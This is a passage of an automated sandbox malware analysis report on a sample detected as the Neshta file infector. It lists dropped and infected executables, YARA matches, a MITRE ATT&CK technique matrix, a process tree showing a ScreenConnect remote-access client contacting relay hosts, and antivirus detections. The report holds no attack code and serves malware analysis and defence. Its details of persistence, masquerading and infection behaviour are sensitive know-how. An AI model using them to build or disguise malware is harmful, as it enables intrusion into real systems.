                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Code function: 1_2_00DF60A4 cpuid | 1_2_00DF60A4
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040F270 GetLocalTime | 0_2_0040F270
                          Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId | 0_2_0040D815
                          Source: $RUX313H.exe, 00000000.00000003.883707805.00000000020C4000.00000004.00000001.sdmp, svchost.com, 00000002.00000003.906541565.0000000002154000.00000004.00000001.sdmp | Binary or memory string: MSASCui.exe
                          Source: $RUX313H.exe, 00000000.00000003.883707805.00000000020C4000.00000004.00000001.sdmp, svchost.com, 00000002.00000003.906541565.0000000002154000.00000004.00000001.sdmp | Binary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information:

                          Yara detected Neshta
                          Source: Yara match | File source: $RUX313H.exe, type: SAMPLE
                          Source: Yara match | File source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Source: Yara matchFile source: 11.0.ScreenConnect.WindowsClient.exe.920000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.920000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.ScreenConnect.ClientService.exe.3db0000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000002.1207076385.0000000003DB2000.00000002.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.1187139644.0000000000922000.00000002.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.1203004972.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000000.699734443.0000000000922000.00000002.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Config.Msi\5e0b04.rbs, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Installer\MSIDF1.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1140 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,1_2_00DF1140
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F1160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,9_2_003F1160

Mitre Att&ck Matrix

(Cells are separated by "|"; the number in parentheses after a technique is the signature-count badge the report attaches to it. The Remote Service Effects column has only three entries, so it is empty in the later rows.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media (1) | Native API (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | Input Capture (121) | System Time Discovery (1) | Taint Shared Content (1) | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter (13) | Application Shimming (1) | Application Shimming (1) | Obfuscated Files or Information (1) | LSASS Memory | Peripheral Device Discovery (11) | Replication Through Removable Media (1) | Input Capture (121) | Exfiltration Over Bluetooth | Non-Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Service Execution (2) | Windows Service (23) | Windows Service (23) | Software Packing (1) | Security Account Manager | File and Directory Discovery (4) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Registry Run Keys / Startup Folder (1) | Process Injection (12) | DLL Side-Loading (1) | NTDS | System Information Discovery (35) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder (1) | File Deletion (1) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading (322) | Cached Domain Credentials | Security Software Discovery (14) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (21) | DCSync | Process Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (12) | Proc Filesystem | Virtualization/Sandbox Evasion (21) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 (1) | /etc/passwd and /etc/shadow | Remote System Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                          Behavior Graph

Behavior Graph ID: 495328; Sample: $RUX313H.exe; Start date: 01/10/2021; Architecture: WINDOWS; Score: 100

Top-level signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 4 other signatures.

Process tree (node numbers as in the graph):

• 8 $RUX313H.exe: drops C:\Windows\svchost.com (PE32), C:\Users\user\AppData\Local\...\setup.exe (PE32), C:\Users\user\AppData\Local\...\$RUX313H.exe (PE32) and 108 other malicious files; signatures: Creates an undocumented autostart registry key; Drops PE files with a suspicious file extension; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html); starts 19 $RUX313H.exe.
• 12 msiexec.exe: drops C:\Windows\Installer\MSIFE7.tmp (PE32), C:\Windows\Installer\MSIDF2.tmp (PE32), C:\Windows\Installer\MSI13D3.tmp (PE32) and 8 other files (none is malicious); starts 23 msiexec.exe, 25 msiexec.exe and 27 msiexec.exe.
• 14 ScreenConnect.ClientService.exe: contacts server-nixce85832f-relay.screenconnect.com (145.40.105.136, ports 443, 49728, 49729; BREEDBANDDELFTNL, Netherlands), 192.168.2.1 (port 274, unknown, unknown) and instance-qchhoo-relay.screenconnect.com; starts 29 ScreenConnect.WindowsClient.exe.
• 17: 3 other processes.
• 19 $RUX313H.exe: drops C:\Users\user\AppData\...\$RUX313H.exe.log (ASCII); signature: Drops executables to the windows directory (C:\Windows) and starts them; starts 31 svchost.com.
• 23 msiexec.exe: starts 35 rundll32.exe.
• 31 svchost.com: drops C:\Windows\directx.sys (ASCII); signature: Sample is not signed and drops a device driver; starts 37 msiexec.exe.
• 35 rundll32.exe: drops C:\...\ScreenConnect.InstallerActions.dll (PE32), C:\Users\user\...\ScreenConnect.Core.dll (PE32), Microsoft.Deployme...indowsInstaller.dll (PE32).
• 37 msiexec.exe: drops C:\Users\user\AppData\Local\...\MSIFE41.tmp (PE32).

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

Source | Detection | Scanner | Label
$RUX313H.exe | 100% | Avira | W32/Neshta.A
$RUX313H.exe | 100% | Joe Sandbox ML |

                          Dropped Files

Source | Detection | Scanner | Label
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Neshta.A
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Avira | W32/Neshta.A
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Avira | W32/Neshta.A
